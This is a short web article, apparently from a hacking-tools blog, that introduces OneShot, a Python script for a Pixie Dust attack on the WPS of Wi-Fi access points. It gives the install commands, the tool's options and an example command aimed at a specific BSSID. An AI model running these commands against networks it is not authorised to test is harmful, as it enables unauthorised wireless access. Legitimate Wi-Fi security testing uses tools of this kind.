Perform a Pixie Dust attack without having to switch to monitor mode

Perform a Pixie Dust attack without having to switch to monitor mode

OneShot is a script on Python that executes the Pixie Dust attack without switching to monitor mode. To get the necessary data wpa_supplicant is used.

Trequirements:

    • Python 3.6 and above;

Installation in Kali Linux

All the necessary dependencies in Kali Linux are already present, just download the script itself:



git clone https://github.com/drygdryg/OneShot.
cd OneShot/
sudo ./oneshot.py --help

Help

Use:

oneshot.py <arguments>

Options:

Required arguments:
    -i, --interface=<wlan0> : interface name to use
    -b, --bssid=<mac> : BSSID target TD
 
Optional arguments:
    -p, --pin=<wps pin> : Use a specific PIN (any line or 4/8 digital PIN)
    -K, --pixie-dust : Launch Pixie Dust attack
    -F, --force : Run Pixiewps with --force option (gross-force full range)
    -X : Always print Pixiewps command
    -v : Detailed output

OneShot Examples

.

.
Launch a Pixie Dust attack (-K) against an Access Point (-b 00: 90:4C:C1:AC:21) using the specified interface (-i wlan0):



oneshot.py -i wlan0 -b 00:90:4C:C1:AC:21 -K


WARNING! All links in the articles may lead to malicious sites or contain viruses. Follow them at your own risk. Those who purposely visit the article know what they are doing. Do not click on everything thoughtlessly.


7 Views

0 0 vote
Article Rating
Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments


Do NOT follow this link or you will be banned from the site!
0
Would love your thoughts, please comment.x
()
x

Spelling error report

The following text will be sent to our editors: